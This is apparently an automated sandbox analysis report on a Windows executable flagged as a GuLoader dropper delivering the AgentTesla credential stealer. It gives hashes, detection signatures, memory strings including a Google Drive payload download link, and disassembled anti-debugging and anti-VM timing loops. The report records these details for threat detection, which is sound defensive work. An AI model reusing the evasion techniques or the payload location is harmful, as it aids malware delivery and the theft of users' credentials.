Analysis Report Muligheds.exe

Overview

General Information

Sample Name: Muligheds.exe
Analysis ID: 356091
MD5: 4aa8881d2d0103703bd7301616cd8caf
SHA1: e21e7048c04cad52b8f1ddfaa60135d0399ae202
SHA256: 24e85ac996d35004ddc5768581a4c025c8620a5f42896d33c02f00c64d921e2f
Tags: exe, GuLoader

Detection

AgentTesla GuLoader
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected AgentTesla
Yara detected GuLoader
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Startup

  • System is w10x64
  • Muligheds.exe (PID: 5896 cmdline: 'C:\Users\user\Desktop\Muligheds.exe' MD5: 4AA8881D2D0103703BD7301616CD8CAF)
    • RegAsm.exe (PID: 3868 cmdline: 'C:\Users\user\Desktop\Muligheds.exe' MD5: 6FD7592411112729BF6B1F2F6C34899F)
      • conhost.exe (PID: 3892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

| Source | Rule | Description | Author | Strings |
| --- | --- | --- | --- | --- |
| 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security | |
| 00000008.00000002.474329596.000000001DEE1000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | |
| 00000008.00000002.474329596.000000001DEE1000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | |
| Process Memory Space: RegAsm.exe PID: 3868 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | |
| Process Memory Space: RegAsm.exe PID: 3868 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | |

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Compliance:

            Uses 32bit PE files
            Source: Muligheds.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Uses secure TLS version for HTTPS connections
            Source: unknown | HTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.3:49711 version: TLS 1.2
            Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknown | DNS traffic detected: queries for: doc-0c-58-docs.googleusercontent.com
            Source: RegAsm.exe, 00000008.00000002.474329596.000000001DEE1000.00000004.00000001.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
            Source: RegAsm.exe, 00000008.00000002.474329596.000000001DEE1000.00000004.00000001.sdmp | String found in binary or memory: http://DynDns.comDynDNS
            Source: RegAsm.exe, 00000008.00000002.474329596.000000001DEE1000.00000004.00000001.sdmp | String found in binary or memory: http://THoUbE.com
            Source: RegAsm.exe | String found in binary or memory: https://drive.google.com/uc?export=download&id=1BCajiRx7Eb3aEQfR45eBviRxNQMQ93hS
            Source: RegAsm.exe, 00000008.00000002.474329596.000000001DEE1000.00000004.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
            Source: Muligheds.exe, 00000000.00000002.327283395.000000000074A000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
            Source: C:\Users\user\Desktop\Muligheds.exe | Process Stats: CPU usage > 98%
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_01215774 NtQueryInformationProcess, 8_2_01215774
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_012153A6 NtProtectVirtualMemory, 8_2_012153A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0121578C NtQueryInformationProcess, 8_2_0121578C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_012157D0 NtQueryInformationProcess, 8_2_012157D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0121582C NtQueryInformationProcess, 8_2_0121582C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_01215882 NtQueryInformationProcess, 8_2_01215882
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_012158D6 NtQueryInformationProcess, 8_2_012158D6
            Source: C:\Users\user\Desktop\Muligheds.exe | Code function: 0_2_00401859, 0_2_00401859
            Source: C:\Users\user\Desktop\Muligheds.exe | Code function: 0_2_0040180C, 0_2_0040180C
            Source: C:\Users\user\Desktop\Muligheds.exe | Code function: 0_2_0040161D, 0_2_0040161D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_1FFE47A0, 8_2_1FFE47A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_1FFE4790, 8_2_1FFE4790
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_201A90D8, 8_2_201A90D8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_201A7120, 8_2_201A7120
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_201A6508, 8_2_201A6508
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_201A6850, 8_2_201A6850
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
            Source: classification engine | Classification label: mal84.troj.evad.winEXE@4/0@1/1
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3892:120:WilError_01
            Source: C:\Users\user\Desktop\Muligheds.exe | File created: C:\Users\user\AppData\Local\Temp\~DFF74510EC8D1D8160.TMP
            Source: Muligheds.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Muligheds.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\Desktop\Muligheds.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: unknown | Process created: C:\Users\user\Desktop\Muligheds.exe 'C:\Users\user\Desktop\Muligheds.exe'
            Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Muligheds.exe'
            Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Muligheds.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Muligheds.exe'
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected

            Data Obfuscation:

            Yara detected GuLoader
            Source: Yara match | File source: 00000008.00000002.469137619.0000000001211000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 3868, type: MEMORY
            Source: C:\Users\user\Desktop\Muligheds.exe | Code function: 0_2_00407D1C push esp; retf 0_2_00407D1F
            Source: C:\Users\user\Desktop\Muligheds.exe | Code function: 0_2_00407264 push es; retf 0_2_004072FA
            Source: C:\Users\user\Desktop\Muligheds.exe | Code function: 0_2_004072E3 push es; retf 0_2_004072FA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_012156CF push esp; ret 8_2_012156D6
            Source: C:\Users\user\Desktop\Muligheds.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            Detected RDTSC dummy instruction sequence (likely for instruction hammering)
            Source: C:\Users\user\Desktop\Muligheds.exe | RDTSC instruction interceptor: First address: 0000000000722671 second address: 0000000000722671 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F9B4CB6B488h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d pop ecx 0x0000001e add edi, edx 0x00000020 dec ecx 0x00000021 cmp ecx, 00000000h 0x00000024 jne 00007F9B4CB6B471h 0x00000026 push ecx 0x00000027 cmp ch, dh 0x00000029 call 00007F9B4CB6B4A2h 0x0000002e call 00007F9B4CB6B498h 0x00000033 lfence 0x00000036 mov edx, dword ptr [7FFE0014h] 0x0000003c lfence 0x0000003f ret 0x00000040 mov esi, edx 0x00000042 pushad 0x00000043 rdtsc
            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Tries to detect Any.run
            Source: C:\Users\user\Desktop\Muligheds.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\Desktop\Muligheds.exe | File opened: C:\Program Files\qga\qga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Program Files\qga\qga.exe
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: RegAsm.exe | Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\Muligheds.exe | RDTSC instruction interceptor: First address: 0000000000722671 second address: 0000000000722671 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F9B4CB6B488h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d pop ecx 0x0000001e add edi, edx 0x00000020 dec ecx 0x00000021 cmp ecx, 00000000h 0x00000024 jne 00007F9B4CB6B471h 0x00000026 push ecx 0x00000027 cmp ch, dh 0x00000029 call 00007F9B4CB6B4A2h 0x0000002e call 00007F9B4CB6B498h 0x00000033 lfence 0x00000036 mov edx, dword ptr [7FFE0014h] 0x0000003c lfence 0x0000003f ret 0x00000040 mov esi, edx 0x00000042 pushad 0x00000043 rdtsc
            Source: C:\Users\user\Desktop\Muligheds.exe | RDTSC instruction interceptor: First address: 0000000000722810 second address: 0000000000722810 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F9B4CBB1AFFh 0x0000001d popad 0x0000001e cmp ebx, D5708B63h 0x00000024 call 00007F9B4CBAF71Dh 0x00000029 lfence 0x0000002c rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | RDTSC instruction interceptor: First address: 0000000001212810 second address: 0000000001212810 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F9B4CB6D86Fh 0x0000001d popad 0x0000001e cmp ebx, D5708B63h 0x00000024 call 00007F9B4CB6B48Dh 0x00000029 lfence 0x0000002c rdtsc
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_01212D41 rdtsc 8_2_01212D41
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Window / User API: threadDelayed 371
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Window / User API: threadDelayed 9440
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1320 | Thread sleep time: -8301034833169293s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: RegAsm.exe | Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process information queried: ProcessInformation

            Anti Debugging:

            Hides threads from debuggers
            Source: C:\Users\user\Desktop\Muligheds.exe | Thread information set: HideFromDebugger
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\Muligheds.exe | Process queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_01212D41 rdtsc 8_2_01212D41
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_0121333E LdrInitializeThunk, 8_2_0121333E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_01212512 mov eax, dword ptr fs:[00000030h] 8_2_01212512
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_01214916 mov eax, dword ptr fs:[00000030h] 8_2_01214916
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_01214F70 mov eax, dword ptr fs:[00000030h] 8_2_01214F70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_01214F72 mov eax, dword ptr fs:[00000030h] 8_2_01214F72
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 8_2_012140B9 mov eax, dword ptr fs:[00000030h] 8_2_012140B9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process token adjusted: Debug
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: page read and write | page guard
            Source: C:\Users\user\Desktop\Muligheds.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Muligheds.exe'
            Source: RegAsm.exe, 00000008.00000002.469678278.0000000001990000.00000002.00000001.sdmp | Binary or memory string: Program Manager
            Source: RegAsm.exe, 00000008.00000002.469678278.0000000001990000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
            Source: RegAsm.exe, 00000008.00000002.469678278.0000000001990000.00000002.00000001.sdmp | Binary or memory string: Progman
            Source: RegAsm.exe, 00000008.00000002.469678278.0000000001990000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            Yara detected AgentTesla
            Source: Yara match | File source: 00000008.00000002.474329596.000000001DEE1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 3868, type: MEMORY

            Remote Access Functionality:

            Yara detected AgentTesla
            Source: Yara match | File source: 00000008.00000002.474329596.000000001DEE1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 3868, type: MEMORY

            Mitre Att&ck Matrix

| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
| --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
| Valid Accounts | Windows Management Instrumentation 211 | DLL Side-Loading 1 | Process Injection 12 | Virtualization/Sandbox Evasion 34 | Input Capture 1 | Security Software Discovery 631 | Remote Services | Input Capture 1 | Exfiltration Over Other Network Medium | Encrypted Channel 12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
| Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | DLL Side-Loading 1 | Disable or Modify Tools 1 | LSASS Memory | Virtualization/Sandbox Evasion 34 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Non-Application Layer Protocol 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 12 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
| Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 1 | NTDS | Application Window Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud |
| Cloud Accounts | Cron | Network Logon Script | Network Logon Script | DLL Side-Loading 1 | LSA Secrets | Remote System Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
| Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Information Discovery 313 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            No Antivirus matches

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

| Source | Detection | Scanner | Label | Link |
| --- | --- | --- | --- | --- |
| http://THoUbE.com | 0% | Avira URL Cloud | safe | |
| http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe | |
| http://DynDns.comDynDNS | 0% | URL Reputation | safe | |
| https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe | |

            Domains and IPs

            Contacted Domains

            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            googlehosted.l.googleusercontent.com | 142.250.186.33 | true | false |  | high
            doc-0c-58-docs.googleusercontent.com | unknown | unknown | false |  | high

                URLs from Memory and Binaries

                Name | Source | Malicious | Antivirus Detection | Reputation
                http://THoUbE.com | RegAsm.exe, 00000008.00000002.474329596.000000001DEE1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                http://127.0.0.1:HTTP/1.1 | RegAsm.exe, 00000008.00000002.474329596.000000001DEE1000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
                http://DynDns.comDynDNS | RegAsm.exe, 00000008.00000002.474329596.000000001DEE1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | RegAsm.exe, 00000008.00000002.474329596.000000001DEE1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown

                Contacted IPs

                Public

                IP | Domain | Country | ASN | ASN Name | Malicious
                142.250.186.33 | unknown | United States | 15169 | GOOGLEUS | false

                General Information

                Joe Sandbox Version:31.0.0 Emerald
                Analysis ID:356091
                Start date:22.02.2021
                Start time:14:47:32
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 5m 43s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:Muligheds.exe
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:14
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal84.troj.evad.winEXE@4/0@1/1
                EGA Information:Failed
                HDC Information:
                • Successful, ratio: 65.1% (good quality ratio 45.1%)
                • Quality average: 48.5%
                • Quality standard deviation: 36.1%
                HCA Information:
                • Successful, ratio: 95%
                • Number of executed functions: 41
                • Number of non-executed functions: 18
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .exe
                Warnings:
                • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                • Excluded IPs from analysis (whitelisted): 52.255.188.83, 13.88.21.125, 104.43.139.144, 184.30.20.56, 8.241.80.126, 67.27.141.126, 8.252.5.126, 8.241.126.249, 8.250.157.254, 216.58.212.174
                • Excluded domains from analysis (whitelisted): fs.microsoft.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, drive.google.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus15.cloudapp.net, au-bg-shim.trafficmanager.net
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                Time | Type | Description
                14:49:24 | API Interceptor | 389x Sleep call for process: RegAsm.exe modified

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                Match: googlehosted.l.googleusercontent.com

                ASN

                Match: GOOGLEUS

                JA3 Fingerprints

                Match: 37f463bf4616ecd445d4a1937da06e19

                Dropped Files

                No context

                Created / dropped Files

                No created / dropped files found

                Static File Info

                General

                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):5.399140948343833
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.15%
                • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:Muligheds.exe
                File size:73728
                MD5:4aa8881d2d0103703bd7301616cd8caf
                SHA1:e21e7048c04cad52b8f1ddfaa60135d0399ae202
                SHA256:24e85ac996d35004ddc5768581a4c025c8620a5f42896d33c02f00c64d921e2f
                SHA512:0f8b546c0cfdf82c6e39b206f36f88fc458306c795a8c84b7b97cdd6ead6942742ea04bd20e0cbbf9887484c6754cbf8c6a05c1eca8ee4c7e93115681813968b
                SSDEEP:1536:NDl1YJvgC/9jLqF8hgCNIB3smGKzl85zlYwhdFD:N5WJxIbCNIB3PGSlozl1nF
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.......................D.......=.......Rich............PE..L......S.....................0....................@................

                File Icon

                Icon Hash:1e74f2ea62e4a082

                Static PE Info

                General

                Entrypoint:0x401494
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                DLL Characteristics:
                Time Stamp:0x5304B2E8 [Wed Feb 19 13:34:32 2014 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:b84199caadebcbcd5f63d7b7de7ff518

                Entrypoint Preview

                Instruction
                push 00409FECh
                call 00007F9B4CCB7AC3h
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                xor byte ptr [eax], al
                add byte ptr [eax], al
                inc eax
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [esi], cl
                dec esi
                cmpsd
                xor eax, esp
                retf 496Eh
                sahf
                inc esi
                sbb ebx, dword ptr [eax+7899F8EEh]
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add dword ptr [eax], eax
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                inc ecx
                dec esp
                inc esp
                inc ebp
                push edx
                push ebx
                push ebx
                push esi
                dec ebx
                dec ebx
                inc ebp
                inc esp
                inc ebp
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add bh, bh
                int3
                xor dword ptr [eax], eax
                or dword ptr [ebx-25B2B446h], esi
                aaa
                inc ecx
                lahf
                popad
                mov edi, dword ptr [ecx+edx*8-60h]
                sti

                Data Directories

                Name | Virtual Address | Virtual Size | Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IMPORT | 0xf0f4 | 0x28 | .text
                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x12000 | 0xc04 | .rsrc
